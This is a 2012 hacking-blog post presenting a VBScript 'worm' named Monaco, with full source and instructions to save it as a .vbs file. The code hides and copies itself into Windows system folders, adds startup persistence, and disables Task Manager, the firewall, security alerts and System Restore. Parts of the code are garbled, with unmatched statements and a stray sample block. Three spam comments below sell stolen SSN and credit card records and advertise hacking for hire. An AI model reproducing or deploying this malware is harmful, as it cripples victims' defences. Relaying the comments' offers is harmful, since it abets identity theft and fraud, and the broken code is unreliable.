Friday, 31 August 2012

New Worm Called Monaco

Recently i have been working on a worm which effects the entire registry and disable task manager. If you execute this worm , your home page will be my blog http://theethicalhackerz.blogspot.com.



Be careful do not run this worm. If you run this worm your home page will be my blog :D
Hehe...
On Error Resume Next

' monaco By 315cu1t V.
set fso=CreateObject("Scripting.FileSystemObject")
set shell=CreateObject("Wscript.Shell")

Function Hide(filename)
Set file = fso.GetFile(filename)
file.Attributes = -2
End Function
hide(WScript.ScriptFullName)
path = "C:\windows\mfxjla.exe"
fso.CopyFile Wscript.ScriptFullName,path
hide(path)
Shell.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Sasaxquo", "C:\Windows\mfxjla.exe"
path = "C:\windows\zhuchj.exe"
fso.CopyFile Wscript.ScriptFullName,path
hide(path)
Shell.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Saszoqor", "C:\Windows\zhuchj.exe, "REG_SZ"
path = "C:\Windows\eojyhnzad.exe"
fso.CopyFile Wscript.ScriptFullName,path
hide(path)
Shell.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\eojyhnzad", path, "REG_SZ"
Shell.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"

Shell.regwrite "HKLM\Software\Microsoft\Internet Explorer\Main\Start Page","http://theethicalhackerz.blogspot.com", "REG_SZ"
Shell.regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://theethicalhackerz.blogspot.com", "REG_SZ"
Shell.regwrite "HKCU\Software\Microsoft\Security Center\FirewallDisableNotify", "1", "REG_DWORD"
Shell.regwrite "HKCU\Software\Microsoft\Security Center\UpdatesDisableNotify", "1", "REG_DWORD"
Shell.regwrite "HKCU\Software\Microsoft\Security Center\AntiVirusDisableNotify", "1", "REG_DWORD"
Shell.regwrite "HKLM\Software\Microsoft\Security Center\FirewallDisableNotify", "1", "REG_DWORD"
Shell.regwrite "HKLM\Software\Microsoft\Security Center\UpdatesDisableNotify", "1", "REG_DWORD"
Shell.regwrite "HKLM\Software\Microsoft\Security Center\AntiVirusDisableNotify", "1", "REG_DWORD"
Shell.regwrite "HKCU\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile\EnableFirewall","0","REG_DWORD"
Shell.regwrite "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile\EnableFirewall","0","REG_DWORD"
Shell.regwrite "HKCU\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile\EnableFirewall","0","REG_DWORD"
Shell.regwrite "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile\EnableFirewall","0","REG_DWORD"
Shell.run "",false
Shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore\DisableSR","1", "REG_DWORD"
Shell.regwrite "HKLM\SYSTEM\CurrentControlSet\Services\sr","4", "REG_DWORD"
Shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCDisable","FFFFFF9D","REG_DWORD"
' Sample Plugin File
' This plugin is an example. Use it to guide you when making your own plugins

msgtitle = "Alert" ' Set The Message Box Title
msgtext = "hi there" 'Set The Message Box Text

Call MsgBox(msgtext,65,msgtitle)

' :-------:
Shell.RegWrite("HKLM\SYSTEM\CurrentControlSet\Control\Lsa\restrictAnonymous", "1", REG_DWORD)
Shell.RegWrite("HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\PasswordExpiryWarning", "0", "REG_DWORD")
End if
End if

Now save the file with .vbs extension.
That's it!! 
Posted by at
Labels: ,

3 comments:

  1. Spam Leads3 July 2020 at 01:11

    Hey Guys !

    USA Fresh & Verified SSN Leads AVAILABLE with best connectivity
    All Leads have genuine & valid information

    **HEADERS IN LEADS**
    First Name | Last Name | SSN | Dob | DL Number |Address | State | City | Zip | Phone Number | Account Number | Bank Name

    *Price for SSN lead $2
    *You can ask for sample before any deal
    *If anyone buy in bulk, we can negotiate
    *Sampling is just for serious buyers

    ==>ACTIVE & FRESH CC FULLZ ALSO AVAILABLE<==
    ->$5 PER EACH

    ->Hope for the long term deal
    ->Interested buyers will be welcome

    **Contact 24/7**
    Whatsapp > +923172721122
    Email > leads.sellers1212@gmail.com
    Telegram > @leadsupplier
    ICQ > 752822040

    ReplyDelete
  2. jane holly17 July 2020 at 20:41


    This professional hacker is absolutely reliable and I strongly recommend him for any type of hack you require. I know this because I have hired him severally for various hacks and he has never disappointed me nor any of my friends who have hired him too, he can help you with any of the following hacks:

    -Phone hacks (remotely)
    -Credit repair
    -Bitcoin recovery (any cryptocurrency)
    -Make money from home (USA only)
    -Social media hacks
    -Website hacks
    -Erase criminal records (USA & Canada only)
    -Grade change

    Email: onlineghosthacker247@ gmail .com

    ReplyDelete
  3. No Name19 August 2020 at 14:36

    Hello Everyone !

    USA SSN Leads/Fullz available, along with Driving License/ID Number with good connectivity.

    All SSN's are Tested & Verified.

    **DETAILS IN LEADS/FULLZ**

    ->FULL NAME
    ->SSN
    ->DATE OF BIRTH
    ->DRIVING LICENSE NUMBER
    ->ADDRESS WITH ZIP
    ->PHONE NUMBER, EMAIL
    ->EMPLOYEE DETAILS

    *Price for SSN lead $2
    *You can ask for sample before any deal
    *If you buy in bulk, will give you discount
    *Sampling is just for serious buyers

    ->Hope for the long term business
    ->You can buy for your specific states too

    **Contact 24/7**

    Whatsapp > +923172721122

    Email > leads.sellers1212@gmail.com

    Telegram > @leadsupplier

    ICQ > 752822040

    ReplyDelete

Subscribe to: Post Comments (Atom)